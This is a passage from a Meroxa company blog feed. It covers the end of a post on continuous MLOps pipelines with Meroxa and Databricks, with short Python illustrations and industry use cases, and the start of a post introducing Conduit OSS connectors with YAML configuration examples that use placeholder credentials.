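                or hours_since_last_run >= self.max_staleness_hours)

policy = RetrainPolicy()
policy.should_retrain(new_records=12_500, hours_since_last_run=0.2)  # True: enough data
policy.should_retrain(new_records=300, hours_since_last_run=0.5)     # False: wait
```

&lt;p&gt;In practice a check like this would live in a scheduled Databricks job or an event handler watching the Delta table.&lt;/p&gt;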
&lt;h2&gt;Real-Time Data &amp;#x26; Model Workflow&lt;/h2&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/mermaid-diagram-2025-02-05-123258.png&quot; alt=&quot;mermaid-diagram-2025-02-05-123258.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;In the sequence diagram above, &lt;strong&gt;Meroxa (MX)&lt;/strong&gt; streams data to &lt;strong&gt;Databricks (DB)&lt;/strong&gt;, which trains and validates an ML model. Metrics are tracked in &lt;strong&gt;MLflow (MF)&lt;/strong&gt;, and after validation, the new model may replace the existing production model. The pipeline completes when predictions and performance data flow back into Meroxa for real-time consumption by downstream apps.&lt;/p&gt;
&lt;h3&gt;Set Up Meroxa Pipelines&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Configure Connectors&lt;/strong&gt;: Select source connectors (e.g., a payment gateway, Kafka topic, or user activity logs) and a destination connector for Databricks (or a compatible endpoint).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Apply Transformations&lt;/strong&gt;: Define real-time transformations such as filtering out invalid records, anonymizing sensitive data, or joining with metadata tables.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Monitor Pipeline Health&lt;/strong&gt;: Use Meroxa&apos;s dashboard or CLI tools to track throughput, latency, and error rates.&lt;/li&gt;
&lt;/ul&gt;
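&lt;p&gt;The transformation step above can be sketched in plain Python. This is a minimal illustration of the filter/anonymize/enrich pattern, not Meroxa&apos;s actual transformation API; the field names are hypothetical:&lt;/p&gt;

```python
import hashlib
from typing import Optional

def transform(record: dict) -> Optional[dict]:
    """Filter invalid records, anonymize PII, and enrich in flight (illustrative)."""
    # Filter: drop records that are missing required fields.
    if not record.get("user_id") or record.get("amount") is None:
        return None
    out = dict(record)
    # Anonymize: replace the raw user id with a stable hash.
    out["user_id"] = hashlib.sha256(record["user_id"].encode()).hexdigest()[:12]
    # Enrich: derive a feature downstream models can use directly.
    out["is_large"] = record["amount"] > 1000
    return out

events = [
    {"user_id": "u-42", "amount": 2500},
    {"user_id": "", "amount": 10},  # dropped: no user id
]
clean = [t for e in events if (t := transform(e)) is not None]
```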
&lt;h3&gt;Prepare Databricks Workspace&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Provision a Cluster&lt;/strong&gt;: Configure a Databricks cluster with the necessary compute and libraries (Spark MLlib, TensorFlow, PyTorch, etc.)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Create Delta Tables&lt;/strong&gt;: Set up a Delta Lake table schema to accommodate the transformed data from Meroxa.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Integrate MLflow&lt;/strong&gt;: Ensure MLflow is enabled for tracking experiments, models, and parameters.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Design the Training Pipeline&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Notebook Development&lt;/strong&gt;: In a Databricks notebook, define your feature extraction steps, model architecture, and training procedures.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Automated Trigger&lt;/strong&gt;: Use Databricks Jobs to schedule or event-trigger your notebook whenever new data arrives in the Delta table.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;MLflow Logging&lt;/strong&gt;: Log relevant metrics (accuracy, precision, recall, etc.) to MLflow for each run. Store the trained model artifacts in MLflow&apos;s model registry.&lt;/li&gt;
&lt;/ul&gt;
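&lt;p&gt;To make the logging step concrete, here is a tiny stand-in for experiment tracking in plain Python. A real pipeline would log parameters and metrics to MLflow inside a run rather than to this hypothetical in-memory tracker, but the idea is the same: record every run, then select the best one:&lt;/p&gt;

```python
runs = []  # in-memory stand-in for an experiment tracking store

def log_run(params: dict, metrics: dict) -> None:
    """Record one training run's hyperparameters and evaluation metrics."""
    runs.append({"params": params, "metrics": metrics})

def best_run(metric: str = "accuracy") -> dict:
    """Pick the run that scored highest on the chosen metric."""
    return max(runs, key=lambda r: r["metrics"][metric])

log_run({"lr": 0.1},  {"accuracy": 0.88, "recall": 0.80})
log_run({"lr": 0.01}, {"accuracy": 0.91, "recall": 0.84})
best_run()["params"]  # the lr=0.01 run wins on accuracy
```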
&lt;h3&gt;Validate and Deploy Models&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Validation Step&lt;/strong&gt;: Compare the new model&apos;s performance metrics against the currently deployed model.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Release to Production&lt;/strong&gt;: If performance improvements meet your threshold, automatically deploy the new model to a production endpoint or scheduled job for real-time inference.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Rollback Mechanism&lt;/strong&gt;: In case of unexpected performance issues, quickly revert to the previously successful model version stored in MLflow.&lt;/li&gt;
&lt;/ul&gt;
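&lt;p&gt;The validation-and-rollback logic above boils down to a comparison against the production model&apos;s metrics. A minimal sketch, assuming a single accuracy metric and a hypothetical improvement threshold (real deployments would read these from the model registry):&lt;/p&gt;

```python
def should_promote(candidate: dict, production: dict,
                   min_improvement: float = 0.01) -> bool:
    """Promote only if the candidate beats production by a margin (illustrative)."""
    return candidate["accuracy"] >= production["accuracy"] + min_improvement

versions = ["v1"]  # stand-in for a registry's production version history

def deploy(candidate: str, candidate_metrics: dict, prod_metrics: dict) -> str:
    """Return the version serving traffic after the validation step."""
    if should_promote(candidate_metrics, prod_metrics):
        versions.append(candidate)  # new model goes live
    return versions[-1]             # otherwise the old version keeps serving

deploy("v2", {"accuracy": 0.93}, {"accuracy": 0.90})  # promotes v2
deploy("v3", {"accuracy": 0.91}, {"accuracy": 0.93})  # keeps v2 serving
```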
&lt;h3&gt;Advantages of Continuous Feedback&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Up-to-Date Models&lt;/strong&gt;: Frequent retraining with the latest data minimizes model drift and maintains higher predictive accuracy.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Faster Iteration&lt;/strong&gt;: Real-time feedback loops enable rapid testing of new hypotheses and model architectures, accelerating R&amp;#x26;D.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Automated Monitoring&lt;/strong&gt;: As predictions are generated, key metrics (e.g., accuracy, latency, resource usage) are monitored and fed back into the pipeline, creating a continuous improvement loop.&lt;/li&gt;
&lt;/ul&gt;
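&lt;p&gt;Model drift, mentioned in the first point, can be watched with a simple statistic. A minimal sketch, assuming a single numeric feature: compare live values against the training-time reference and retrain when the standardized mean shift grows too large (the threshold of 2.0 is an assumption):&lt;/p&gt;

```python
from statistics import mean, stdev

def drift_score(reference: list, live: list) -> float:
    """Standardized shift of the live feature mean vs. the training baseline."""
    sd = stdev(reference) or 1.0  # guard against a constant reference column
    return abs(mean(live) - mean(reference)) / sd

reference = [10.0, 11.0, 9.0, 10.5, 9.5]  # feature values seen at training time
steady    = [10.2, 9.8, 10.1]             # live traffic, same distribution
shifted   = [14.0, 15.0, 14.5]            # live traffic after behavior changed

drift_score(reference, steady) < 2.0   # below threshold: keep serving
drift_score(reference, shifted) > 2.0  # above threshold: trigger retraining
```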
&lt;h3&gt;Minimizing Integration Complexity&lt;/h3&gt;
&lt;p&gt;While many solutions claim to support real-time pipelines, &lt;strong&gt;integration complexity&lt;/strong&gt; often stalls adoption. Meroxa, by contrast, is purpose-built to reduce friction at every step:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Unified Configuration&lt;/strong&gt;: Instead of juggling various scripts or YAML files across multiple services, Meroxa provides a centralized interface to configure your data flows. This simplifies the pipeline creation process for data engineers.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Pre-Built Connectors&lt;/strong&gt;: With a library of managed connectors, you can plug into popular data sources (SQL/NoSQL databases, event buses, SaaS applications) without writing custom code. This shortens the timeline from proof-of-concept to production.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Seamless Databricks Integration&lt;/strong&gt;: Meroxa automatically routes data to Delta Lake tables or endpoints accessible by Databricks. Configure your pipeline once, and new data flows in near real time—no complicated bridging scripts needed.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Self-Service &amp;#x26; Automation&lt;/strong&gt;: Meroxa&apos;s low-code/no-code philosophy lets non-specialists set up and modify streaming pipelines. This frees your core engineering team to focus on higher-level tasks like optimizing models.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Optimizing Total Cost of Ownership (TCO)&lt;/h3&gt;
&lt;p&gt;Beyond easy integration, &lt;strong&gt;cost management&lt;/strong&gt; is a major factor in evaluating any new platform. Meroxa offers significant TCO advantages by:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Reducing Data Engineering Overhead&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Eliminate Custom Code&lt;/strong&gt;: Every hour spent coding one-off connectors or troubleshooting ingestion scripts adds cost. Meroxa&apos;s managed connectors reduce the burden on developers and accelerate time-to-market.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Streamlined Maintenance&lt;/strong&gt;: Automated pipeline monitoring, schema change handling, and alerting minimize ongoing maintenance. Fewer break-fix cycles mean lower operational costs.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Optimizing Compute Resources&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Real-Time Stream Processing&lt;/strong&gt;: Meroxa processes data continuously, avoiding batch processing spikes. Resources scale with data flow instead of running at full capacity on fixed schedules.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Targeted Transformations&lt;/strong&gt;: Pre-processing data in flight ensures only relevant data reaches Databricks or Delta Lake. This upstream filtering reduces storage and CPU usage, especially for large datasets.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Auto-Scaling &amp;#x26; Pay-as-You-Go&lt;/strong&gt;: Meroxa automatically scales pipeline resources as data volumes change. This ensures you pay only for needed capacity, avoiding costly over-provisioning.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Enhancing Model Efficiency&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Higher-Quality Input&lt;/strong&gt;: Cleaner, more consistent data leads to more effective training runs. Models converge faster and need fewer re-runs, saving Databricks compute costs.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Faster Iterations&lt;/strong&gt;: Quick model updates catch performance issues early, preventing wasted compute on suboptimal versions.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;In short, Meroxa&apos;s approach to data ingestion and stream processing accelerates ML project delivery while controlling compute and operational expenses. When combined with Databricks&apos; scalable environment, you get a cost-effective, robust platform for real-time MLOps at enterprise scale.&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;Real-World Applications &amp;#x26; Benefits&lt;/h2&gt;
&lt;p&gt;Real-time data ingestion and continuous MLOps aren’t just buzzwords; they solve pressing, bottom-line challenges across various industries. Here’s how it looks in practice, with Meroxa and Databricks delivering &lt;strong&gt;rapid, adaptive&lt;/strong&gt; machine learning.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;E-Commerce&lt;/h3&gt;
&lt;h3&gt;&lt;strong&gt;Challenge&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;E-commerce companies often rely on outdated or batch-driven recommendations, resulting in stale product suggestions that don’t reflect a user’s most recent clicks and purchase behavior. The result? Low engagement and missed upsell opportunities.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Solution&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;With Meroxa handling real-time clickstream ingestion, raw event data (page views, shopping cart activity, searches) continuously streams into Databricks and updates ML models in near real time. As soon as a user clicks on a product, that data is transformed and available for on-the-fly recommendation model retraining or feature updates.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Impact&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Personalized Offers&lt;/strong&gt;: Visitors immediately see recommendations based on their latest browsing.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Increased Conversions&lt;/strong&gt;: By serving fresh, relevant suggestions, conversion rates climb.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Scalable Growth&lt;/strong&gt;: Auto-scaling real-time pipelines handle peak traffic during sales events without over-provisioning.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;E-Commerce Real-Time Flow&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/mermaid-diagram-2025-02-05-123518.png&quot; alt=&quot;mermaid-diagram-2025-02-05-123518.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;In this flow, Meroxa ingests high-velocity click events, Databricks trains or updates the recommendation model, and the production environment serves personalized suggestions back to the user in seconds.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;Finance&lt;/h3&gt;
&lt;h3&gt;&lt;strong&gt;Challenge&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Banks and payment providers need to detect fraudulent transactions in real time. Traditional batch-based models may flag suspicious activities hours or even days late—leading to financial losses and reputational damage.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Solution&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;By streaming live transaction records into Meroxa from point-of-sale systems and online payment gateways, data is instantly enriched (e.g., geolocation, user profile) and passed into Databricks for anomaly detection model scoring. If anomalies are detected, the system immediately flags or halts suspicious transactions.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Impact&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Reduced Fraud Losses&lt;/strong&gt;: Instant detection cuts down on unauthorized activity before it escalates.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Regulatory Compliance&lt;/strong&gt;: Updated models help maintain compliance with fast-changing financial rules.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Improved Customer Trust&lt;/strong&gt;: Swift fraud alerts demonstrate robust security measures, boosting brand reputation.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Finance Real-Time Fraud Detection Flow&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/mermaid-diagram-2025-02-05-125659.png&quot; alt=&quot;mermaid-diagram-2025-02-05-125659.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;Meroxa collects transactions from multiple sources (POS, online gateways), enriches them, and streams them into Databricks for real-time anomaly detection. Suspicious activities trigger alerts to both internal teams and potentially to the customers themselves.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;Healthcare&lt;/h3&gt;
&lt;h3&gt;&lt;strong&gt;Challenge&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Healthcare providers struggle to monitor critical patient data—like heart rate or blood pressure—across thousands of IoT devices, creating a data deluge that’s hard to analyze quickly for early warning signs of complications.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Solution&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Meroxa ingests continuous sensor readings from wearables or in-facility devices, applying transformations for noise reduction and anonymization. Databricks then applies advanced ML models (e.g., anomaly detection) to flag unusual trends in real time. Alerts are pushed back to clinicians or care teams almost instantly.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Impact&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Proactive Patient Care&lt;/strong&gt;: Immediate alerts allow medical staff to intervene before minor symptoms become major crises.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Scalable Management&lt;/strong&gt;: Cloud-based streaming and MLOps can handle thousands (or millions) of devices without bottlenecks.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Enhanced Research&lt;/strong&gt;: Rich real-time data informs predictive studies, improving overall treatment protocols.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Healthcare Real-Time Monitoring Flow&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/mermaid-diagram-2025-02-05-123914.png&quot; alt=&quot;mermaid-diagram-2025-02-05-123914.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;Here, Meroxa handles secure, high-volume ingestion from IoT health devices. Databricks processes and flags critical anomalies so caregivers can respond proactively.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;Manufacturing &amp;#x26; IoT&lt;/h3&gt;
&lt;h3&gt;&lt;strong&gt;Challenge&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Factories rely on heavy machinery that can suddenly fail, causing unplanned downtime, safety issues, and lost revenue. Traditional maintenance schedules (weekly or monthly checks) don’t catch emerging problems in real time.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Solution&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;By streaming sensor data (temperatures, vibration readings, pressure gauges) through Meroxa, anomalies in the data are immediately spotted. Databricks models—trained on historical fault patterns—predict potential failures before they happen, triggering maintenance orders or system shutdowns to prevent accidents.&lt;/p&gt;
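&lt;p&gt;The &quot;anomalies are immediately spotted&quot; step can be illustrated with a rolling z-score check on a single sensor stream. This is a hypothetical sketch, not the platform&apos;s API; a production model would instead be trained on historical fault patterns as described above:&lt;/p&gt;

```python
from collections import deque
from statistics import mean, stdev

class SensorMonitor:
    """Flag readings that sit far outside the recent rolling baseline."""
    def __init__(self, window: int = 50, z_threshold: float = 3.0):
        self.readings = deque(maxlen=window)
        self.z_threshold = z_threshold

    def observe(self, value: float) -> bool:
        """Return True if this reading looks anomalous vs. the recent window."""
        anomalous = False
        if len(self.readings) >= 10:  # need a baseline before judging
            mu, sd = mean(self.readings), stdev(self.readings)
            if sd > 0 and abs(value - mu) / sd > self.z_threshold:
                anomalous = True
        self.readings.append(value)  # kept simple: anomalies enter the window too
        return anomalous

monitor = SensorMonitor()
for v in [0.9, 1.1] * 15:  # 30 normal vibration readings around 1.0
    monitor.observe(v)
monitor.observe(1.05)  # within the normal band: False
monitor.observe(5.0)   # far outside the baseline: True
```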
&lt;h3&gt;&lt;strong&gt;Impact&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Reduced Downtime&lt;/strong&gt;: Proactive interventions ensure machines stay operational.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Cost Savings&lt;/strong&gt;: Avoiding catastrophic failures saves on repair bills and production delays.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Operational Safety&lt;/strong&gt;: Real-time alerts protect workers and assets by halting malfunctioning equipment.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Manufacturing &amp;#x26; IoT Predictive Maintenance Flow&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/mermaid-diagram-2025-02-05-124022.png&quot; alt=&quot;mermaid-diagram-2025-02-05-124022.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;Sensor data is continuously ingested by Meroxa, then used within Databricks to score for potential failures. Alerts can either notify human operators or automatically shut down risky equipment to avoid accidents.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;Why This Matters&lt;/h3&gt;
&lt;p&gt;Across industries, these use cases demonstrate the clear competitive advantage of continuous MLOps:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Live Data&lt;/strong&gt; ⇒ &lt;strong&gt;Timely, relevant predictions&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Automated Model Updates&lt;/strong&gt; ⇒ &lt;strong&gt;Adaptive to changing conditions&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Real-Time Insights&lt;/strong&gt; ⇒ &lt;strong&gt;Proactive, data-driven decisions&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;From e-commerce startups to global banks, Meroxa + Databricks transforms raw data into actionable intelligence—protecting revenue, boosting customer satisfaction, and driving innovation.&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;A continuous MLOps pipeline with real-time feedback loops has become essential for staying competitive in today&apos;s data-driven markets. By pairing Meroxa&apos;s real-time data ingestion and stream processing capabilities with Databricks&apos; powerful model development, deployment, and monitoring tools, you can build an end-to-end system that evolves seamlessly with new data.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Key Takeaways&lt;/strong&gt;:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;MLOps Is the Future of ML&lt;/strong&gt;: Traditional ad-hoc machine learning approaches can&apos;t keep pace with today&apos;s evolving data and business needs. MLOps delivers the repeatability, scalability, and maintainability modern organizations require.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Real-Time Feedback Loops Drive Better Outcomes&lt;/strong&gt;: By incorporating streaming data into your pipeline, your models learn faster and maintain higher accuracy over time.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Meroxa and Databricks Form a Powerful Tandem&lt;/strong&gt;: Build intelligent solutions without reinventing data pipelines and machine learning infrastructure from the ground up.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Start Small, Scale Fast&lt;/strong&gt;: Begin your continuous MLOps pipeline with a single use case, then expand the framework to additional data sources and models as you grow.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Minimal Friction &amp;#x26; Strong ROI&lt;/strong&gt;: Meroxa&apos;s seamless integration and cost-optimizing features make adopting real-time pipelines easier, delivering faster time-to-value and lower TCO.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Ready to see how Meroxa and Databricks can transform your ML initiatives? Connect with our team or start a proof of concept (POC). With the right tools and architecture, you&apos;ll be delivering scalable, insightful, and responsive machine learning solutions in no time.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;&lt;strong&gt;Interested in learning more?&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Visit &lt;a href=&quot;https://meroxa.com/&quot;&gt;Meroxa&lt;/a&gt; to see how our platform simplifies real-time data pipelines. Follow us on &lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Twitter&lt;/a&gt;, &lt;a href=&quot;https://www.linkedin.com/company/meroxa&quot;&gt;LinkedIn&lt;/a&gt;, and &lt;a href=&quot;https://youtube.com/@meroxadata143&quot;&gt;YouTube&lt;/a&gt; for more insights and updates!&lt;/li&gt;
&lt;/ul&gt;</content:encoded></item><item><title><![CDATA[Unlock New Possibilities with Meroxa's Conduit OSS: New Connectors for Developers]]></title><description><![CDATA[At Meroxa, we’re empowering developers with Conduit OSS, a tool that simplifies real-time data engineering. With our latest release of new connectors, integrating with popular platforms is seamless, accelerating development and delivering real-time data insights. Here's a look at what's available now and what's coming next!]]></description><link>https://meroxa.com/blog/unlock-new-possibilities-with-meroxas-conduit-oss-new-connectors-for-developers</link><guid isPermaLink="false">https://meroxa.com/blog/unlock-new-possibilities-with-meroxas-conduit-oss-new-connectors-for-developers</guid><dc:creator><![CDATA[Dion Keeton]]></dc:creator><pubDate>Fri, 31 Jan 2025 10:25:00 GMT</pubDate><content:encoded>&lt;p&gt;At &lt;strong&gt;Meroxa&lt;/strong&gt;, we’re empowering developers with &lt;strong&gt;Conduit OSS&lt;/strong&gt;, a tool that simplifies real-time data engineering. With our latest release of new connectors, integrating with popular platforms is seamless, accelerating development and delivering real-time data insights. Here&apos;s a look at what&apos;s available now and what&apos;s coming next!&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Released: New Conduit OSS Connectors&lt;/strong&gt;&lt;/h3&gt;
&lt;h3&gt;&lt;strong&gt;1. &lt;a href=&quot;https://github.com/conduitio-labs/conduit-connector-salesforce&quot;&gt;Salesforce Connector&lt;/a&gt;&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Stream Salesforce object changes using the Salesforce Streaming API.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Configuration Example:&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;salesforce-source&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source
  &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; standalone&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;salesforce
  &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;auth.client_id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&amp;lt;client_id&gt;&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;auth.client_secret&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&amp;lt;client_secret&gt;&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;auth.username&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&amp;lt;username&gt;&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;auth.password&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&amp;lt;password&gt;&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;api.version&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;v52.0&quot;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Use Case:&lt;/strong&gt; Sync Salesforce opportunities to Snowflake for real-time sales insights.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;2. &lt;a href=&quot;https://github.com/conduitio-labs/conduit-connector-kinesis&quot;&gt;Amazon Kinesis Connector&lt;/a&gt;&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Stream high-throughput data into Kinesis for real-time analytics.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Configuration Example:&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;kinesis-destination&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; destination
  &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; standalone&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;kinesis
  &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;aws.region&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;us-east-1&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;aws.access_key_id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&amp;lt;access_key&gt;&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;aws.secret_access_key&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&amp;lt;secret_key&gt;&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;stream_name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;my-data-stream&quot;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Use Case:&lt;/strong&gt; Stream IoT data for real-time monitoring and alerts.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;3. &lt;a href=&quot;https://github.com/conduitio-labs/conduit-connector-sqs&quot;&gt;Amazon SQS Connector&lt;/a&gt;&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Simplify message handling with Amazon Simple Queue Service (SQS).&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Configuration Example:&lt;/strong&gt;&lt;/p&gt;
